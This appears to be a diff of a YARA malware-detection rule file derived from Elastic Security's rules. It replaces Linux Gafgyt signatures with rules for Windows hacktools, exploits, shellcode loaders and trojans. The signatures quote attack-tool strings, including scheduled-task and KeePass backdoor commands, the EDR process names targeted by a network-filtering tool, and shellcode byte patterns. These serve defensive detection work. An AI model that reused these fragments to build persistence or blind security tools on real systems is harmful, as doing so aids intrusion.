/V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x04][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x03][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Gafgyt_6321B565 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_EDRWFP_F6D7Db7A : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Edrwfp (Windows.Hacktool.EDRWFP)" author = "Elastic Security" - id = "6321b565-ed25-4bf2-be4f-3ffa0e643085" - date = "2021-01-12" - modified = "2021-09-16" + id = "f6d7db7a-c55e-41dc-859b-6431464e72f4" + date = "2024-06-10" + modified = "2024-07-02" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L80-L98" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cd48addd392e7912ab15a5464c710055f696990fab564f29f13121e7a5e93730" - logic_hash = "ad5c73ab68059101acf2fd8cfb3d676fd1ff58811e1c4b9008c291361ee951b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_EDRWFP.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a1fc2f3ded852f75e36e70ae39087e21ae5b6af10e2038d04e61bd500ba511e2" + logic_hash = "45d427e4f52346b4a18c154bb0afb636c18951fd9c7323846bf2eb7e47928ef6" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "c1d286e82426cbf19fc52836ef9a6b88c1f6e144967f43760df93cf1ab497d07" + tags = "FILE" + fingerprint = "11e4224f53ddb5ef18aef5efeaa7ec6ec00072e57db5189e29a04feae6b3da31" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D8 89 D0 01 C0 01 D0 C1 E0 03 8B 04 08 83 E0 1F 0F AB 84 9D 58 FF } + $s1 = "elastic-endpoint.exe" + $s2 = "elastic-agent.exe" + $s3 = "MsMpEng.exe" + $s4 = "FwpmFilterAdd0" condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_A6A2Adb9 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharpapplocker_9645Cf22 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Sharpapplocker (Windows.Hacktool.SharpAppLocker)" author = "Elastic Security" - id = "a6a2adb9-9d54-42d4-abed-5b30d8062e97" - date = "2021-01-12" - modified = "2021-09-16" + id = "9645cf22-f9b3-45ff-a5d8-513c59ad3d53" + date = "2022-11-20" + modified = "2023-01-11" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L100-L118" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" - logic_hash = "8f5fc4cb1ad51178701509a44a793e119fe7e7fad97eafcac8be14fce64e3b7b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpAppLocker.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965" + logic_hash = "cb72ecf7715b288acddac51dab091d84c64e3bd30276cba38a0d773e6693875c" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877" + fingerprint = "720a96f7baa8af4e6189709ee906350c291e175ac861c83d425b235d9217bb32" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { CC 01 C2 89 55 B4 8B 45 B4 C9 C3 55 48 89 E5 48 81 EC 90 00 } + $guid = "FE102D27-DEC4-42E2-BF69-86C79E08B67D" ascii wide nocase + $print_str0 = "[+] Output written to:" ascii wide fullword + $print_str1 = "[!] You can only select one Policy at the time." ascii wide fullword + $print_str2 = "SharpAppLocker.exe --effective --allow --rules=\"FileHashRule,FilePathRule\" --outfile=\"C:\\Windows\\Tasks\\Rules.json\"" ascii wide fullword condition: - all of them + $guid or all of ($print_str*) } -rule ELASTIC_Linux_Trojan_Gafgyt_C573932B : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharpersist_06606812 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Sharpersist (Windows.Hacktool.Sharpersist)" author = "Elastic Security" - id = "c573932b-9b3f-4ab7-a6b6-32dcc7473790" - date = "2021-01-12" - modified = "2021-09-16" + id = "06606812-2be2-4155-a82b-6ab4629c5b5a" + date = "2022-10-20" + modified = "2022-11-24" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L120-L138" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68" - logic_hash = "174a3fcebc1e17cc35ddc11fde1798164b5783fc51fdf16581a9690c3b4d6549" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharPersist.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8" + logic_hash = "ddabfb54422f6fb2ad6999b724b1d8f186adf71f96f01a8770715029529e869a" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266" + fingerprint = "44fd3f1146d81c34051f8ef4619db369d364e809799e7ca57bea93fb8fef5d4c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 83 7D 18 00 74 22 8B 45 1C 83 E0 02 85 C0 74 18 83 EC 08 6A 2D FF } + $guid = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii wide nocase + $print_str0 = "schtaskbackdoor: backdoor scheduled task" ascii wide + $print_str1 = "schtaskbackdoor -m list -n " ascii wide + $print_str2 = "SharPersist" ascii wide + $print_str3 = "[+] SUCCESS: Keepass persistence backdoor added" ascii wide condition: - all of them + $guid or all of ($print_str*) } -rule ELASTIC_Linux_Trojan_Gafgyt_A10161Ce : FILE MEMORY +rule ELASTIC_Windows_Exploit_CVE_2022_38028_31Fdb122 : FILE MEMORY CVE_2022_38028 { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Exploit Cve 2022 38028 (Windows.Exploit.CVE-2022-38028)" author = "Elastic Security" - id = "a10161ce-62e0-4f60-9de7-bd8caf8618be" - date = "2021-01-12" - modified = "2021-09-16" + id = "31fdb122-36fd-4fae-b605-542dc344575c" + date = "2024-06-06" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L140-L157" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "12ba13a746300d1ab1d0386b86ec224eebf4e6d0b3688495c2fee6a7eccc361d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Exploit_CVE_2022_38028.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" + logic_hash = "df0ef11ce8e840c331d1db8f98917367dc2a33b6f1be48adb9d0b86729ecbe99" score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "77e89011a67a539954358118d41ad3dabde0e69bac2bbb2b2da18eaad427d935" + quality = 73 + tags = "FILE, MEMORY, CVE-2022-38028" + fingerprint = "e489287412ee673f4d93c5efc9e61b5d26d877bb0f4ddf827926b4d5d87dc399" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 45 B0 8B 45 BC 48 63 D0 48 89 D0 48 C1 E0 02 48 8D 14 10 48 8B } + $a = { 70 72 69 6E 74 54 69 63 6B 65 74 2E 58 6D 6C 4E 6F 64 65 2E 6C 6F 61 64 28 27 25 53 3A 2F 2F 67 6F 27 29 3B } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_Ae01D978 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2010_3301_79D52Efd : FILE MEMORY CVE_2010_3301 { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Exploit Cve 2010 3301 (Linux.Exploit.CVE-2010-3301)" author = "Elastic Security" - id = "ae01d978-d07d-4813-a22b-5d172c477d08" - date = "2021-01-12" + id = "79d52efd-7955-4aa3-afbe-b7d172c30f34" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L159-L176" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c6c22b11dc1f0d4996e5da92c6edf58b7d21d7be40da87ddd39ed0e2d4c84072" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2010_3301.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "53a2163ad17a414d9db95f5287d9981c9410e7eaeea096610ba622eb763a6970" + logic_hash = "1d4eb14042f552aa1577d0fe452e92c25bda66d0ad1a66e824677bee65908578" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "2d937c6009cfd53e11af52482a7418546ae87b047deabcebf3759e257cd89ce1" + tags = "FILE, MEMORY, CVE-2010-3301" + fingerprint = "22235427bc621e07c16c365ddbf22a4e1c04d7a0f23c3e4c46d967d908256567" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71510,28 +71829,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_Ae01D978 : FILE MEMORY os = "linux" strings: - $a = { 00 00 2C 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A } + $a = { E8 3B F9 FF FF 83 7D D4 FF 75 16 48 8D 3D 35 03 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_9E9530A7 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2010_3301_D0Eb0924 : FILE MEMORY CVE_2010_3301 { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Exploit Cve 2010 3301 (Linux.Exploit.CVE-2010-3301)" author = "Elastic Security" - id = "9e9530a7-ad4d-4a44-b764-437b7621052f" - date = "2021-01-12" + id = "d0eb0924-dae1-46f9-a4d0-c9e69f781a22" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L178-L196" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961" - logic_hash = "6a5a80e58c86a80f8954e678a2cc26b258d7d7c50047a3e71f3580f1780e3454" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2010_3301.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "907995e90a80d3ace862f2ffdf13fd361762b5acc5397e14135d85ca6a61619b" + logic_hash = "5229be3d1997ee4d05846d6804ffafd36c088dd8607a1fba39a0a43950e448c1" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50" + tags = "FILE, MEMORY, CVE-2010-3301" + fingerprint = "bb288a990938aa21aba087a0400d6f4765a622f8ed36d1dd7953d09cbb09ff83" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71539,28 +71858,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_9E9530A7 : FILE MEMORY os = "linux" strings: - $a = { F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3 } + $a = { E8 3C FA FF FF 83 7D EC FF 75 19 BF 20 13 40 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_5Bf62Ce4 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2010_3301_A5828970 : FILE MEMORY CVE_2010_3301 { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Exploit Cve 2010 3301 (Linux.Exploit.CVE-2010-3301)" author = "Elastic Security" - id = "5bf62ce4-619b-4d46-b221-c5bf552474bb" - date = "2021-01-12" + id = "a5828970-7a30-421c-be92-5659c18b88d1" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L198-L216" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68" - logic_hash = "848e0c796584cfa21afc182da5f417f5467ae84c74f52cabc13e0f5de4990232" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2010_3301.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4fc781f765a65b714ec27080f25c03f20e06830216506e06325240068ba62d83" + logic_hash = "61b0cb38a6e14efee157547e811450d2ed4674f79ac86656a8d984084f71a665" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3" + tags = "FILE, MEMORY, CVE-2010-3301" + fingerprint = "72223f502b2a129380ab011b785f6589986d2eb177580339755d12840617ce5f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71568,56 +71887,61 @@ rule ELASTIC_Linux_Trojan_Gafgyt_5Bf62Ce4 : FILE MEMORY os = "linux" strings: - $a = { 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D } + $a = { E8 7C FC FF FF 83 7D EC FF 75 19 BF 40 0E 40 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_F3D83A74 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Svcready_Af498D39 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Svcready (Windows.Trojan.SVCReady)" author = "Elastic Security" - id = "f3d83a74-2888-435a-9a3c-b7de25084e9a" - date = "2021-01-12" - modified = "2021-09-16" + id = "af498d39-6ae8-46de-ad6c-81b346d80139" + date = "2022-06-12" + modified = "2022-07-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L218-L236" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" - logic_hash = "2db46180e66c9268a97d63cd1c4eb8439e6882b4e3277bc4848e940e4d25482f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SVCReady.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "08e427c92010a8a282c894cf5a77a874e09c08e283a66f1905c131871cc4d273" + logic_hash = "e3520103064cf82cd1747f8889667929d23466c9febfda7e4968a3679db97d71" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a" + fingerprint = "6e30d9977698c7864a8c264a7fe8c9a558f6e51dda9c887bda94261ce187645f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { DC 00 74 1B 83 7D E0 0A 75 15 83 7D E4 00 79 0F C7 45 C8 01 00 } + $a1 = "RunPEDllNative::HookNtCreateUserProcess fail: targetMapping.valid" ascii fullword + $a2 = "Section Mapping error:Process=0x%x Section [%s] res[0x%x] != va[0x%x] Status:%u" ascii fullword + $a3 = "%s - %I64d < %I64d > %I64d clicks, %I64d pixels, ready=%i" ascii fullword + $a4 = "Svc:windowThreadRunner done" ascii fullword + $a5 = "svc commonMain" ascii fullword condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Gafgyt_807911A2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Snessik_D166F98C : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Trojan Snessik (Linux.Trojan.Snessik)" author = "Elastic Security" - id = "807911a2-f6ec-4e65-924f-61cb065dafc6" + id = "d166f98c-0fa3-4a1b-a6d2-7fbe4e338fc7" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L238-L255" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "66b15304d5ed22daea666bd0e2b18726b8a058361ff8d69b974bfded933a4d8c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Snessik.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3ececc2edfff2f92d80ed3a5140af55b6bebf7cae8642a0d46843162eeddddd" + logic_hash = "44f15a87d48338aafa408d4bcabef844c8864cd95640ad99208b5035e28ccd27" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f" + fingerprint = "6247d59326ea71426862e1b242c7354ee369fbe6ea766e40736e2f5a6410c8d7" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71625,27 +71949,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_807911A2 : FILE MEMORY os = "linux" strings: - $a = { FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D } + $a = { D2 74 3B 83 CA FF F0 0F C1 57 10 85 D2 7F 9F 48 8D 74 24 2E 89 44 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_9C18716C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Snessik_E435A79C : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Trojan Snessik (Linux.Trojan.Snessik)" author = "Elastic Security" - id = "9c18716c-e5cd-4b4f-98e2-0daed77f34cd" + id = "e435a79c-4b8e-42de-8d78-51b684eba178" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L257-L274" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "0e70dc82b2049a6f5efcc501e18e6f87e04a2d50efcb5143240c68c4a924de52" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Snessik.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e24749b07f824a4839b462ec4e086a4064b29069e7224c24564e2ad7028d5d60" + logic_hash = "4850530a0566844447f56f4e5cb43c5982b1dcb784bb1aef3e377525b8651ed3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "351772d2936ec1a14ee7e2f2b79a8fde62d02097ae6a5304c67e00ad1b11085a" + fingerprint = "bd9f81d03812e49323b86b2ea59bf5f08021d0b43f7629eb4d59e75eccb7dcf1" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71653,1067 +71978,1115 @@ rule ELASTIC_Linux_Trojan_Gafgyt_9C18716C : FILE MEMORY os = "linux" strings: - $a = { FC 80 F6 FE 59 21 EC 75 10 26 CF DC 7B 5A 5B 4D 24 C9 C0 F3 } + $a = { C6 75 38 31 C0 48 8B 5C 24 68 48 8B 6C 24 70 4C 8B 64 24 78 4C 8B AC 24 80 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_Fbed4652 : FILE MEMORY +rule ELASTIC_Windows_Shellcode_Rdi_Edc62A10 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Shellcode Rdi (Windows.Shellcode.Rdi)" author = "Elastic Security" - id = "fbed4652-2c68-45c6-8116-e3fe7d0a28b8" - date = "2021-01-12" - modified = "2021-09-16" + id = "edc62a10-7cb1-4fda-a15c-86d40d510ffd" + date = "2023-06-23" + modified = "2023-07-10" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L276-L294" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2ea21358205612f5dc0d5f417c498b236c070509531621650b8c215c98c49467" - logic_hash = "fc1f501123ab7421034e183186b077f65838b475f883d4ff04e8fc8a283424ef" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Shellcode_Rdi.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "64485ffc283e981c8b77db5a675c7ba2a04d3effaced522531185aa46eb6a36b" + logic_hash = "986cb6c28d2d9767a2fd084fdd71edb7a1c36e78ddedf3c562076cf6f5b5afd1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a08bcc7d0999562b4ef2d8e0bdcfa111fe0f76fc0d3b14d42c8e93b7b90abdca" - severity = 100 + fingerprint = "1cee85457eb31be126a41d4e332735957cf4a928fdf4b5253380b6c97605d069" + severity = 90 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 02 00 00 2B 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D } + $a = { E8 00 00 00 00 59 49 89 C8 48 81 C1 23 0B 00 00 BA [10] 00 41 B9 04 00 00 00 56 48 89 E6 48 83 E4 F0 48 83 EC 30 C7 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_94A44Aa5 : FILE MEMORY +rule ELASTIC_Windows_Shellcode_Rdi_Eee75D2C : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Shellcode Rdi (Windows.Shellcode.Rdi)" author = "Elastic Security" - id = "94a44aa5-6c8b-40b9-8aac-d18cf4a76a19" - date = "2021-01-12" - modified = "2021-09-16" + id = "eee75d2c-78ef-460f-be96-4638443952fb" + date = "2023-08-25" + modified = "2023-11-02" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L296-L314" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a7694202f9c32a9d73a571a30a9e4a431d5dfd7032a500084756ba9a48055dba" - logic_hash = "deb46c2960dc4868b7bac1255d8753895950bc066dec03674a714860ff72ef2c" - score = 60 - quality = 45 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Shellcode_Rdi.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8c4de69e89dcc659d2fff52d695764f1efd7e64e0a80983ce6d0cb9eeddb806c" + logic_hash = "18cd9be4af210686872610f832ac0ad58a48588a1226fc6093348ceb8371c6b4" + score = 75 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "daf7e0382dd4a566eb5a4aac8c5d9defd208f332d8e327637d47b50b9ef271f9" + fingerprint = "2b8f840cecec00ce3112ea58e4e957e1b0754380e14a8fc8a39abc36feb077e9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 00 00 83 F8 FF 0F 45 C2 48 8B 4C 24 08 64 48 33 0C 25 28 00 } + $a = { 81 EC 14 01 00 00 53 55 56 57 6A 6B 58 6A 65 66 89 84 24 CC 00 00 00 33 ED 58 6A 72 59 6A 6E 5B 6A 6C 5A 6A 33 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_E0673A90 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_A6E956C9 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies the API address lookup function leverage by metasploit shellcode" author = "Elastic Security" - id = "e0673a90-165e-4347-a965-e8d14fdf684b" - date = "2021-01-12" - modified = "2021-09-16" + id = "a6e956c9-799e-49f9-b5c5-ac68aaa2dc21" + date = "2021-03-23" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L316-L334" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6" - logic_hash = "149147eedd66f9ca2dad9cb69f37abc849d44331ec1b5d2917ab3867ced0b274" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L1-L19" + license_url = 